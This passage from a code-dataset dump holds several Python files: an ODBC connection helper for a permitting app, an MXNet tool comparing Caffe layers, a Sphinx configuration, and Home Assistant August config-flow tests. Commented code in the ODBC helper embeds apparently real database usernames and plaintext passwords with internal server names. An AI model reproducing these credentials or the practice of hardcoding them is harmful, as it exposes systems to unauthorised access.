sum.\")\n"},"license":{"kind":"string","value":"agpl-3.0"}}},{"rowIdx":2472,"cells":{"repo_name":{"kind":"string","value":"L3nzian/AutoPermit"},"path":{"kind":"string","value":"ap_connections.py"},"copies":{"kind":"string","value":"1"},"size":{"kind":"string","value":"7082"},"content":{"kind":"string","value":"#import pyodbc\nimport odbc\nimport _winreg\nimport ConfigParser\n\n\nconfig_file = 'AutoPermit.ini'\n\n\ndef get_config_dict(config_file, section):\n \"\"\"\n Reads a config file\n :param config_file: a config file usable by ConfigParser\n :param section: a section in the config file\n :return: a dictionary section's entries\n \"\"\"\n\n dict1 = {}\n config = ConfigParser.ConfigParser()\n config.optionxform = str # Override optionxform so that keys remain case-sensitive\n config.read(config_file)\n options = config.options(section)\n for option in options:\n try:\n dict1[option] = config.get(section, option)\n if dict1[option] == -1:\n print 'not an option'\n except:\n print(\"exception on %s!\" % option)\n dict1[option] = None\n return dict1\n\n\ndef get_odbc_connection_string(con_string):\n \"\"\"\n\n :param con_string: Name of the odbc connection\n :return: odbc connection name/string from config_file\n \"\"\"\n odbc_connections = get_config_dict(config_file, 'odbc_connections')\n return odbc_connections[con_string]\n\n#print get_odbc_connection_string(\"DMMESDEConnection\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n# def MakeConnection():\n# try:\n# strKeyPath = \"SOFTWARE\\ODBC\\ODBC.INI\\ODBC Data Sources\"\n# odbckey = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, strKeyPath)\n# except Exception as e:\n# pass\n# try:\n# strValueName = \"Dmlr_DB\"\n# strValue = \"SQL Server\"\n# _winreg.SetValueEx(odbckey, strValueName, 0, _winreg.REG_SZ, strValue)\n# except:\n# pass\n# try:\n# strKeyPath = \"SOFTWARE\\ODBC\\ODBC.INI\\Dmlr_DB\"\n# valKey = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, strKeyPath)\n# strValueName = \"Database\"\n# strValue = \"dmlr\"\n# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)\n# strValueName = \"Driver\"\n# strValue = \"C:\\WINDOWS\\System32\\SQLSRV32.dll\"\n# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)\n# strValueName = \"Server\"\n# strValue = \"wsq00796\"\n# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)\n# strValueName = \"Trusted_Connection\"\n# strValue = \"Yes\"\n# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)\n# except:\n# pass\n# try:\n# _winreg.CloseKey(valKey)\n# except:\n# pass\n# try:\n# strValueName = \"DMMESDEConnection\"\n# strValue = \"SQL Server\"\n# _winreg.SetValueEx(odbckey, strValueName, 0, _winreg.REG_SZ, strValue)\n# except:\n# pass\n# try:\n# strKeyPath = \"SOFTWARE\\ODBC\\ODBC.INI\\DMMESDEConnection\"\n# valKey = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, strKeyPath)\n# strValueName = \"Database\"\n# strValue = \"Ep\"\n# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)\n# strValueName = \"Driver\"\n# strValue = \"C:\\WINDOWS\\System32\\SQLSRV32.dll\"\n# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)\n# strValueName = \"Server\"\n# strValue = \"wsq00796\"\n# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)\n# strValueName = \"Trusted_Connection\"\n# strValue = \"Yes\"\n# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)\n# except:\n# pass\n# try:\n# _winreg.CloseKey(valKey)\n# except:\n# pass\n# try:\n# strValueName = \"WaterQuality\"\n# strValue = \"SQL Server\"\n# _winreg.SetValueEx(odbckey, strValueName, 0, _winreg.REG_SZ, strValue)\n# except:\n# pass\n# try:\n# strKeyPath = \"SOFTWARE\\ODBC\\ODBC.INI\\WaterQuality\"\n# valKey = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, strKeyPath)\n# strValueName = \"Database\"\n# strValue = \"WaterQuality\"\n# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)\n# strValueName = \"Driver\"\n# strValue = \"C:\\WINDOWS\\System32\\SQLSRV32.dll\"\n# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)\n# strValueName = \"Server\"\n# strValue = \"DMMESDE\"\n# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)\n# strValueName = \"Trusted_Connection\"\n# strValue = \"Yes\"\n# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)\n# except:\n# pass\n# try:\n# _winreg.CloseKey(valKey)\n# except:\n# pass\n# try:\n# strValueName = \"H2O\"\n# strValue = \"SQL Server\"\n# _winreg.SetValueEx(odbckey, strValueName, 0, _winreg.REG_SZ, strValue)\n# except:\n# pass\n# try:\n# strKeyPath = \"SOFTWARE\\ODBC\\ODBC.INI\\H2O\"\n# valKey = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, strKeyPath)\n# strValueName = \"Database\"\n# strValue = \"H2OSpatial\"\n# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)\n# strValueName = \"Driver\"\n# strValue = \"C:\\WINDOWS\\System32\\SQLSRV32.dll\"\n# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)\n# strValueName = \"Server\"\n# strValue = \"DMMESDE\"\n# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)\n# strValueName = \"Trusted_Connection\"\n# strValue = \"Yes\"\n# _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue)\n# except:\n# pass\n# try:\n# _winreg.CloseKey(valKey)\n# except:\n# pass\n# try:\n# _winreg.CloseKey(odbckey)\n# except:\n# pass\n# try:\n# conn = odbc.odbc(\"Dmlr_DB\")\n# conn2 = odbc.odbc(\"WaterQuality\")\n# conn3 = odbc.odbc(\"DMMESDEConnection\")\n# except:\n# try:\n# conn = odbc.odbc(\"DSN=Dmlr_DB2;UID=ags_service;PWD=Welcome1234\")\n# conn2 = odbc.odbc(\"DSN=WaterQuality2;UID=wq_guest;PWD=wq_guest\")\n# conn3 = odbc.odbc(\"DSN=DMMESDEConnection2;UID=ags_service;PWD=Welcome1234\")\n# except:\n# conn = 1\n# conn2 = 1\n# conn3 = 1\n# connList = [conn, conn2, conn3]\n# return connList\n#\n#\n\n\n\n\n\n\n\n\n\n\n\n\n\n# def get_ep_cursor():\n# con = pyodbc.connect('Trusted_Connection=yes',\n# driver='{SQL Server}',\n# server='wsq00796',\n# database='EP')\n# return con.cursor()\n#\n#\n# def get_dmlr_cursor():\n# con = pyodbc.connect('Trusted_Connection=yes',\n# driver='{SQL Server}',\n# server='wsq00796',\n# database='dmlr')\n# return con.cursor()\n#\n#\n# def get_wq_cursor():\n# con = pyodbc.connect('Trusted_Connection=yes',\n# driver='{SQL Server}',\n# server='dmmesde',\n# database='WaterQuality')\n# return con.cursor()\n"},"license":{"kind":"string","value":"gpl-2.0"}}},{"rowIdx":2473,"cells":{"repo_name":{"kind":"string","value":"luoyetx/mxnet"},"path":{"kind":"string","value":"example/ssd/tools/caffe_converter/compare_layers.py"},"copies":{"kind":"string","value":"54"},"size":{"kind":"string","value":"14536"},"content":{"kind":"string","value":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\"\"\"Test converted models layer by layer\n\"\"\"\nimport os\nimport argparse\nimport logging\nimport mxnet as mx\nimport cv2\nimport numpy as np\n\nlogging.basicConfig(level=logging.INFO)\n\n\ndef read_image(img_path, image_dims=None, mean=None):\n \"\"\"\n Reads an image from file path or URL, optionally resizing to given image dimensions and\n subtracting mean.\n :param img_path: path to file, or url to download\n :param image_dims: image dimensions to resize to, or None\n :param mean: mean file to subtract, or None\n :return: loaded image, in RGB format\n \"\"\"\n\n import urllib\n\n filename = img_path.split(\"/\")[-1]\n if img_path.startswith('http'):\n urllib.urlretrieve(img_path, filename)\n img = cv2.imread(filename)\n else:\n img = cv2.imread(img_path)\n\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n if image_dims is not None:\n img = cv2.resize(img, image_dims) # resize to image_dims to fit model\n img = np.rollaxis(img, 2) # change to (c, h, w) order\n img = img[np.newaxis, :] # extend to (n, c, h, w)\n if mean is not None:\n mean = np.array(mean)\n if mean.shape == (3,):\n mean = mean[np.newaxis, :, np.newaxis, np.newaxis] # extend to (n, c, 1, 1)\n img = img.astype(np.float32) - mean # subtract mean\n\n return img\n\n\ndef _ch_dev(arg_params, aux_params, ctx):\n \"\"\"\n Changes device of given mxnet arguments\n :param arg_params: arguments\n :param aux_params: auxiliary parameters\n :param ctx: new device context\n :return: arguments and auxiliary parameters on new device\n \"\"\"\n new_args = dict()\n new_auxs = dict()\n for k, v in arg_params.items():\n new_args[k] = v.as_in_context(ctx)\n for k, v in aux_params.items():\n new_auxs[k] = v.as_in_context(ctx)\n return new_args, new_auxs\n\n\ndef convert_and_compare_caffe_to_mxnet(image_url, gpu, caffe_prototxt_path, caffe_model_path,\n caffe_mean, mean_diff_allowed, max_diff_allowed):\n \"\"\"\n Run the layer comparison on a caffe model, given its prototxt, weights and mean.\n The comparison is done by inferring on a given image using both caffe and mxnet model\n :param image_url: image file or url to run inference on\n :param gpu: gpu to use, -1 for cpu\n :param caffe_prototxt_path: path to caffe prototxt\n :param caffe_model_path: path to caffe weights\n :param caffe_mean: path to caffe mean file\n \"\"\"\n\n import caffe\n from caffe_proto_utils import read_network_dag, process_network_proto, read_caffe_mean\n from convert_model import convert_model\n\n if isinstance(caffe_mean, str):\n caffe_mean = read_caffe_mean(caffe_mean)\n elif caffe_mean is None:\n pass\n elif len(caffe_mean) == 3:\n # swap channels from Caffe BGR to RGB\n caffe_mean = caffe_mean[::-1]\n\n # get caffe root location, this is needed to run the upgrade network utility, so we only need\n # to support parsing of latest caffe\n caffe_root = os.path.dirname(os.path.dirname(caffe.__path__[0]))\n caffe_prototxt_path = process_network_proto(caffe_root, caffe_prototxt_path)\n\n _, layer_name_to_record, top_to_layers = read_network_dag(caffe_prototxt_path)\n\n caffe.set_mode_cpu()\n caffe_net = caffe.Net(caffe_prototxt_path, caffe_model_path, caffe.TEST)\n\n image_dims = tuple(caffe_net.blobs['data'].shape)[2:4]\n\n logging.info('getting image %s', image_url)\n img_rgb = read_image(image_url, image_dims, caffe_mean)\n img_bgr = img_rgb[:, ::-1, :, :]\n\n caffe_net.blobs['data'].reshape(*img_bgr.shape)\n caffe_net.blobs['data'].data[...] = img_bgr\n _ = caffe_net.forward()\n\n # read sym and add all outputs\n sym, arg_params, aux_params, _ = convert_model(caffe_prototxt_path, caffe_model_path)\n sym = sym.get_internals()\n\n # now mxnet\n if gpu < 0:\n ctx = mx.cpu(0)\n else:\n ctx = mx.gpu(gpu)\n\n arg_params, aux_params = _ch_dev(arg_params, aux_params, ctx)\n arg_params[\"data\"] = mx.nd.array(img_rgb, ctx)\n arg_params[\"prob_label\"] = mx.nd.empty((1,), ctx)\n exe = sym.bind(ctx, arg_params, args_grad=None, grad_req=\"null\", aux_states=aux_params)\n exe.forward(is_train=False)\n\n compare_layers_from_nets(caffe_net, arg_params, aux_params, exe, layer_name_to_record,\n top_to_layers, mean_diff_allowed, max_diff_allowed)\n\n return\n\n\ndef _bfs(root_node, process_node):\n \"\"\"\n Implementation of Breadth-first search (BFS) on caffe network DAG\n :param root_node: root node of caffe network DAG\n :param process_node: function to run on each node\n \"\"\"\n\n from collections import deque\n\n seen_nodes = set()\n next_nodes = deque()\n\n seen_nodes.add(root_node)\n next_nodes.append(root_node)\n\n while next_nodes:\n current_node = next_nodes.popleft()\n\n # process current node\n process_node(current_node)\n\n for child_node in current_node.children:\n if child_node not in seen_nodes:\n seen_nodes.add(child_node)\n next_nodes.append(child_node)\n\n\ndef compare_layers_from_nets(caffe_net, arg_params, aux_params, exe, layer_name_to_record,\n top_to_layers, mean_diff_allowed, max_diff_allowed):\n \"\"\"\n Compare layer by layer of a caffe network with mxnet network\n :param caffe_net: loaded caffe network\n :param arg_params: arguments\n :param aux_params: auxiliary parameters\n :param exe: mxnet model\n :param layer_name_to_record: map between caffe layer and information record\n :param top_to_layers: map between caffe blob name to layers which outputs it (including inplace)\n :param mean_diff_allowed: mean difference allowed between caffe blob and mxnet blob\n :param max_diff_allowed: max difference allowed between caffe blob and mxnet blob\n \"\"\"\n\n import re\n\n log_format = ' {0:<40} {1:<40} {2:<8} {3:>10} {4:>10} {5:<1}'\n\n compare_layers_from_nets.is_first_convolution = True\n\n def _compare_blob(caf_blob, mx_blob, caf_name, mx_name, blob_type, note):\n diff = np.abs(mx_blob - caf_blob)\n diff_mean = diff.mean()\n diff_max = diff.max()\n logging.info(log_format.format(caf_name, mx_name, blob_type, '%4.5f' % diff_mean,\n '%4.5f' % diff_max, note))\n assert diff_mean < mean_diff_allowed\n assert diff_max < max_diff_allowed\n\n def _process_layer_parameters(layer):\n\n logging.debug('processing layer %s of type %s', layer.name, layer.type)\n\n normalized_layer_name = re.sub('[-/]', '_', layer.name)\n\n # handle weight and bias of convolution and fully-connected layers\n if layer.name in caffe_net.params and layer.type in ['Convolution', 'InnerProduct',\n 'Deconvolution']:\n\n has_bias = len(caffe_net.params[layer.name]) > 1\n\n mx_name_weight = '{}_weight'.format(normalized_layer_name)\n mx_beta = arg_params[mx_name_weight].asnumpy()\n\n # first convolution should change from BGR to RGB\n if layer.type == 'Convolution' and compare_layers_from_nets.is_first_convolution:\n compare_layers_from_nets.is_first_convolution = False\n\n # if RGB or RGBA\n if mx_beta.shape[1] == 3 or mx_beta.shape[1] == 4:\n # Swapping BGR of caffe into RGB in mxnet\n mx_beta[:, [0, 2], :, :] = mx_beta[:, [2, 0], :, :]\n\n caf_beta = caffe_net.params[layer.name][0].data\n _compare_blob(caf_beta, mx_beta, layer.name, mx_name_weight, 'weight', '')\n\n if has_bias:\n mx_name_bias = '{}_bias'.format(normalized_layer_name)\n mx_gamma = arg_params[mx_name_bias].asnumpy()\n caf_gamma = caffe_net.params[layer.name][1].data\n _compare_blob(caf_gamma, mx_gamma, layer.name, mx_name_bias, 'bias', '')\n\n elif layer.name in caffe_net.params and layer.type == 'Scale':\n\n if 'scale' in normalized_layer_name:\n bn_name = normalized_layer_name.replace('scale', 'bn')\n elif 'sc' in normalized_layer_name:\n bn_name = normalized_layer_name.replace('sc', 'bn')\n else:\n assert False, 'Unknown name convention for bn/scale'\n\n beta_name = '{}_beta'.format(bn_name)\n gamma_name = '{}_gamma'.format(bn_name)\n\n mx_beta = arg_params[beta_name].asnumpy()\n caf_beta = caffe_net.params[layer.name][1].data\n _compare_blob(caf_beta, mx_beta, layer.name, beta_name, 'mov_mean', '')\n\n mx_gamma = arg_params[gamma_name].asnumpy()\n caf_gamma = caffe_net.params[layer.name][0].data\n _compare_blob(caf_gamma, mx_gamma, layer.name, gamma_name, 'mov_var', '')\n\n elif layer.name in caffe_net.params and layer.type == 'BatchNorm':\n\n mean_name = '{}_moving_mean'.format(normalized_layer_name)\n var_name = '{}_moving_var'.format(normalized_layer_name)\n\n caf_rescale_factor = caffe_net.params[layer.name][2].data\n\n mx_mean = aux_params[mean_name].asnumpy()\n caf_mean = caffe_net.params[layer.name][0].data / caf_rescale_factor\n _compare_blob(caf_mean, mx_mean, layer.name, mean_name, 'mean', '')\n\n mx_var = aux_params[var_name].asnumpy()\n caf_var = caffe_net.params[layer.name][1].data / caf_rescale_factor\n _compare_blob(caf_var, mx_var, layer.name, var_name, 'var',\n 'expect 1e-04 change due to cudnn eps')\n\n elif layer.type in ['Input', 'Pooling', 'ReLU', 'Eltwise', 'Softmax', 'LRN', 'Concat',\n 'Dropout', 'Crop']:\n # no parameters to check for these layers\n pass\n\n else:\n logging.warn('No handling for layer %s of type %s, should we ignore it?', layer.name,\n layer.type)\n\n return\n\n def _process_layer_output(caffe_blob_name):\n\n logging.debug('processing blob %s', caffe_blob_name)\n\n # skip blobs not originating from actual layers, e.g. artificial split layers added by caffe\n if caffe_blob_name not in top_to_layers:\n return\n\n caf_blob = caffe_net.blobs[caffe_blob_name].data\n\n # data should change from BGR to RGB\n if caffe_blob_name == 'data':\n\n # if RGB or RGBA\n if caf_blob.shape[1] == 3 or caf_blob.shape[1] == 4:\n # Swapping BGR of caffe into RGB in mxnet\n caf_blob[:, [0, 2], :, :] = caf_blob[:, [2, 0], :, :]\n mx_name = 'data'\n\n else:\n # get last layer name which outputs this blob name\n last_layer_name = top_to_layers[caffe_blob_name][-1]\n normalized_last_layer_name = re.sub('[-/]', '_', last_layer_name)\n mx_name = '{}_output'.format(normalized_last_layer_name)\n if 'scale' in mx_name:\n mx_name = mx_name.replace('scale', 'bn')\n elif 'sc' in mx_name:\n mx_name = mx_name.replace('sc', 'bn')\n\n if mx_name not in exe.output_dict:\n logging.error('mxnet blob %s is missing, time to extend the compare tool..', mx_name)\n return\n\n mx_blob = exe.output_dict[mx_name].asnumpy()\n _compare_blob(caf_blob, mx_blob, caffe_blob_name, mx_name, 'output', '')\n\n return\n\n # check layer parameters\n logging.info('\\n***** Network Parameters '.ljust(140, '*'))\n logging.info(log_format.format('CAFFE', 'MXNET', 'Type', 'Mean(diff)', 'Max(diff)', 'Note'))\n first_layer_name = layer_name_to_record.keys()[0]\n _bfs(layer_name_to_record[first_layer_name], _process_layer_parameters)\n\n # check layer output\n logging.info('\\n***** Network Outputs '.ljust(140, '*'))\n logging.info(log_format.format('CAFFE', 'MXNET', 'Type', 'Mean(diff)', 'Max(diff)', 'Note'))\n for caffe_blob_name in caffe_net.blobs.keys():\n _process_layer_output(caffe_blob_name)\n\n return\n\n\ndef main():\n \"\"\"Entrypoint for compare_layers\"\"\"\n\n parser = argparse.ArgumentParser(\n description='Tool for testing caffe to mxnet conversion layer by layer')\n parser.add_argument('--image_url', type=str,\n default='http://writm.com/wp-content/uploads/2016/08/Cat-hd-wallpapers.jpg',\n help='input image to test inference, can be either file path or url')\n parser.add_argument('--caffe_prototxt_path', type=str,\n default='./model.prototxt',\n help='path to caffe prototxt')\n parser.add_argument('--caffe_model_path', type=str,\n default='./model.caffemodel',\n help='path to caffe weights')\n parser.add_argument('--caffe_mean', type=str,\n default='./model_mean.binaryproto',\n help='path to caffe mean file')\n parser.add_argument('--mean_diff_allowed', type=int, default=1e-03,\n help='mean difference allowed between caffe blob and mxnet blob')\n parser.add_argument('--max_diff_allowed', type=int, default=1e-01,\n help='max difference allowed between caffe blob and mxnet blob')\n parser.add_argument('--gpu', type=int, default=-1, help='the gpu id used for predict')\n args = parser.parse_args()\n convert_and_compare_caffe_to_mxnet(args.image_url, args.gpu, args.caffe_prototxt_path,\n args.caffe_model_path, args.caffe_mean,\n args.mean_diff_allowed, args.max_diff_allowed)\n\nif __name__ == '__main__':\n main()\n"},"license":{"kind":"string","value":"apache-2.0"}}},{"rowIdx":2474,"cells":{"repo_name":{"kind":"string","value":"icgc-dcc/dcc-storage"},"path":{"kind":"string","value":"docs/conf.py"},"copies":{"kind":"string","value":"1"},"size":{"kind":"string","value":"5104"},"content":{"kind":"string","value":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# score documentation build configuration file, created by\n# sphinx-quickstart on Thu Sep 27 15:44:32 2018.\n#\n# This file is execfile()d with the current directory set to its\n# containing dir.\n#\n# Note that not all possible configuration values are present in this\n# autogenerated file.\n#\n# All configuration values have a default; values that are commented out\n# serve to show the default.\n\n# If extensions (or modules to document with autodoc) are in another directory,\n# add these directories to sys.path here. If the directory is relative to the\n# documentation root, use os.path.abspath to make it absolute, like shown here.\n#\n# import os\n# import sys\n# sys.path.insert(0, os.path.abspath('.'))\n\n\n# -- General configuration ------------------------------------------------\n\n# If your documentation needs a minimal Sphinx version, state it here.\n#\n# needs_sphinx = '1.0'\n\n# Add any Sphinx extension module names here, as strings. They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom\n# ones.\nextensions = ['sphinx.ext.mathjax',\n 'sphinx.ext.viewcode']\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = ['_templates']\n\n# The suffix(es) of source filenames.\n# You can specify multiple suffix as a list of string:\n#\n# source_suffix = ['.rst', '.md']\nsource_suffix = '.rst'\n\n# The master toctree document.\nmaster_doc = 'index'\n\n# General information about the project.\nproject = 'score'\ncopyright = '2018, andricdu'\nauthor = 'andricdu'\n\n# The version info for the project you're documenting, acts as replacement for\n# |version| and |release|, also used in various other places throughout the\n# built documents.\n#\n# The short X.Y version.\nversion = '1.4.0'\n# The full version, including alpha/beta/rc tags.\nrelease = '1.4.0'\n\n# The language for content autogenerated by Sphinx. Refer to documentation\n# for a list of supported languages.\n#\n# This is also used if you do content translation via gettext catalogs.\n# Usually you set \"language\" from the command line for these cases.\nlanguage = None\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\n# This patterns also effect to html_static_path and html_extra_path\nexclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = 'sphinx'\n\n# If true, `todo` and `todoList` produce output, else they produce nothing.\ntodo_include_todos = False\n\n\n# -- Options for HTML output ----------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\n#\nhtml_theme = 'sphinx_rtd_theme'\n\n# Theme options are theme-specific and customize the look and feel of a theme\n# further. For a list of options available for each theme, see the\n# documentation.\n#\n# html_theme_options = {}\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = ['_static']\n\n# Custom sidebar templates, must be a dictionary that maps document names\n# to template names.\n#\n# This is required for the alabaster theme\n# refs: http://alabaster.readthedocs.io/en/latest/installation.html#sidebars\nhtml_sidebars = {\n '**': [\n 'relations.html', # needs 'show_related': True theme option to display\n 'searchbox.html',\n ]\n}\n\n\n# -- Options for HTMLHelp output ------------------------------------------\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = 'scoredoc'\n\n\n# -- Options for LaTeX output ---------------------------------------------\n\nlatex_elements = {\n # The paper size ('letterpaper' or 'a4paper').\n #\n # 'papersize': 'letterpaper',\n\n # The font size ('10pt', '11pt' or '12pt').\n #\n # 'pointsize': '10pt',\n\n # Additional stuff for the LaTeX preamble.\n #\n # 'preamble': '',\n\n # Latex figure (float) alignment\n #\n # 'figure_align': 'htbp',\n}\n\n# Grouping the document tree into LaTeX files. List of tuples\n# (source start file, target name, title,\n# author, documentclass [howto, manual, or own class]).\nlatex_documents = [\n (master_doc, 'score.tex', 'score Documentation',\n 'andricdu', 'manual'),\n]\n\n\n# -- Options for manual page output ---------------------------------------\n\n# One entry per manual page. List of tuples\n# (source start file, name, description, authors, manual section).\nman_pages = [\n (master_doc, 'score', 'score Documentation',\n [author], 1)\n]\n\n\n# -- Options for Texinfo output -------------------------------------------\n\n# Grouping the document tree into Texinfo files. List of tuples\n# (source start file, target name, title, author,\n# dir menu entry, description, category)\ntexinfo_documents = [\n (master_doc, 'score', 'score Documentation',\n author, 'score', 'One line description of project.',\n 'Miscellaneous'),\n]\n\n\n\n"},"license":{"kind":"string","value":"gpl-3.0"}}},{"rowIdx":2475,"cells":{"repo_name":{"kind":"string","value":"mezz64/home-assistant"},"path":{"kind":"string","value":"tests/components/august/test_config_flow.py"},"copies":{"kind":"string","value":"5"},"size":{"kind":"string","value":"9572"},"content":{"kind":"string","value":"\"\"\"Test the August config flow.\"\"\"\nfrom august.authenticator import ValidationResult\n\nfrom homeassistant import config_entries, setup\nfrom homeassistant.components.august.const import (\n CONF_ACCESS_TOKEN_CACHE_FILE,\n CONF_INSTALL_ID,\n CONF_LOGIN_METHOD,\n DOMAIN,\n VERIFICATION_CODE_KEY,\n)\nfrom homeassistant.components.august.exceptions import (\n CannotConnect,\n InvalidAuth,\n RequireValidation,\n)\nfrom homeassistant.const import CONF_PASSWORD, CONF_TIMEOUT, CONF_USERNAME\n\nfrom tests.async_mock import patch\nfrom tests.common import MockConfigEntry\n\n\nasync def test_form(hass):\n \"\"\"Test we get the form.\"\"\"\n await setup.async_setup_component(hass, \"persistent_notification\", {})\n result = await hass.config_entries.flow.async_init(\n DOMAIN, context={\"source\": config_entries.SOURCE_USER}\n )\n assert result[\"type\"] == \"form\"\n assert result[\"errors\"] == {}\n\n with patch(\n \"homeassistant.components.august.config_flow.AugustGateway.async_authenticate\",\n return_value=True,\n ), patch(\n \"homeassistant.components.august.async_setup\", return_value=True\n ) as mock_setup, patch(\n \"homeassistant.components.august.async_setup_entry\",\n return_value=True,\n ) as mock_setup_entry:\n result2 = await hass.config_entries.flow.async_configure(\n result[\"flow_id\"],\n {\n CONF_LOGIN_METHOD: \"email\",\n CONF_USERNAME: \"my@email.tld\",\n CONF_PASSWORD: \"test-password\",\n },\n )\n await hass.async_block_till_done()\n\n assert result2[\"type\"] == \"create_entry\"\n assert result2[\"title\"] == \"my@email.tld\"\n assert result2[\"data\"] == {\n CONF_LOGIN_METHOD: \"email\",\n CONF_USERNAME: \"my@email.tld\",\n CONF_PASSWORD: \"test-password\",\n CONF_INSTALL_ID: None,\n CONF_TIMEOUT: 10,\n CONF_ACCESS_TOKEN_CACHE_FILE: \".my@email.tld.august.conf\",\n }\n assert len(mock_setup.mock_calls) == 1\n assert len(mock_setup_entry.mock_calls) == 1\n\n\nasync def test_form_invalid_auth(hass):\n \"\"\"Test we handle invalid auth.\"\"\"\n result = await hass.config_entries.flow.async_init(\n DOMAIN, context={\"source\": config_entries.SOURCE_USER}\n )\n\n with patch(\n \"homeassistant.components.august.config_flow.AugustGateway.async_authenticate\",\n side_effect=InvalidAuth,\n ):\n result2 = await hass.config_entries.flow.async_configure(\n result[\"flow_id\"],\n {\n CONF_LOGIN_METHOD: \"email\",\n CONF_USERNAME: \"my@email.tld\",\n CONF_PASSWORD: \"test-password\",\n },\n )\n\n assert result2[\"type\"] == \"form\"\n assert result2[\"errors\"] == {\"base\": \"invalid_auth\"}\n\n\nasync def test_user_unexpected_exception(hass):\n \"\"\"Test we handle an unexpected exception.\"\"\"\n result = await hass.config_entries.flow.async_init(\n DOMAIN, context={\"source\": config_entries.SOURCE_USER}\n )\n\n with patch(\n \"homeassistant.components.august.config_flow.AugustGateway.async_authenticate\",\n side_effect=ValueError,\n ):\n result2 = await hass.config_entries.flow.async_configure(\n result[\"flow_id\"],\n {\n CONF_LOGIN_METHOD: \"email\",\n CONF_USERNAME: \"my@email.tld\",\n CONF_PASSWORD: \"test-password\",\n },\n )\n\n assert result2[\"type\"] == \"form\"\n assert result2[\"errors\"] == {\"base\": \"unknown\"}\n\n\nasync def test_form_cannot_connect(hass):\n \"\"\"Test we handle cannot connect error.\"\"\"\n result = await hass.config_entries.flow.async_init(\n DOMAIN, context={\"source\": config_entries.SOURCE_USER}\n )\n\n with patch(\n \"homeassistant.components.august.config_flow.AugustGateway.async_authenticate\",\n side_effect=CannotConnect,\n ):\n result2 = await hass.config_entries.flow.async_configure(\n result[\"flow_id\"],\n {\n CONF_LOGIN_METHOD: \"email\",\n CONF_USERNAME: \"my@email.tld\",\n CONF_PASSWORD: \"test-password\",\n },\n )\n\n assert result2[\"type\"] == \"form\"\n assert result2[\"errors\"] == {\"base\": \"cannot_connect\"}\n\n\nasync def test_form_needs_validate(hass):\n \"\"\"Test we present validation when we need to validate.\"\"\"\n result = await hass.config_entries.flow.async_init(\n DOMAIN, context={\"source\": config_entries.SOURCE_USER}\n )\n\n with patch(\n \"homeassistant.components.august.config_flow.AugustGateway.async_authenticate\",\n side_effect=RequireValidation,\n ), patch(\n \"homeassistant.components.august.gateway.AuthenticatorAsync.async_send_verification_code\",\n return_value=True,\n ) as mock_send_verification_code:\n result2 = await hass.config_entries.flow.async_configure(\n result[\"flow_id\"],\n {\n CONF_LOGIN_METHOD: \"email\",\n CONF_USERNAME: \"my@email.tld\",\n CONF_PASSWORD: \"test-password\",\n },\n )\n\n assert len(mock_send_verification_code.mock_calls) == 1\n assert result2[\"type\"] == \"form\"\n assert result2[\"errors\"] is None\n assert result2[\"step_id\"] == \"validation\"\n\n # Try with the WRONG verification code give us the form back again\n with patch(\n \"homeassistant.components.august.config_flow.AugustGateway.async_authenticate\",\n side_effect=RequireValidation,\n ), patch(\n \"homeassistant.components.august.gateway.AuthenticatorAsync.async_validate_verification_code\",\n return_value=ValidationResult.INVALID_VERIFICATION_CODE,\n ) as mock_validate_verification_code, patch(\n \"homeassistant.components.august.gateway.AuthenticatorAsync.async_send_verification_code\",\n return_value=True,\n ) as mock_send_verification_code, patch(\n \"homeassistant.components.august.async_setup\", return_value=True\n ) as mock_setup, patch(\n \"homeassistant.components.august.async_setup_entry\", return_value=True\n ) as mock_setup_entry:\n result3 = await hass.config_entries.flow.async_configure(\n result[\"flow_id\"],\n {VERIFICATION_CODE_KEY: \"incorrect\"},\n )\n\n # Make sure we do not resend the code again\n # so they have a chance to retry\n assert len(mock_send_verification_code.mock_calls) == 0\n assert 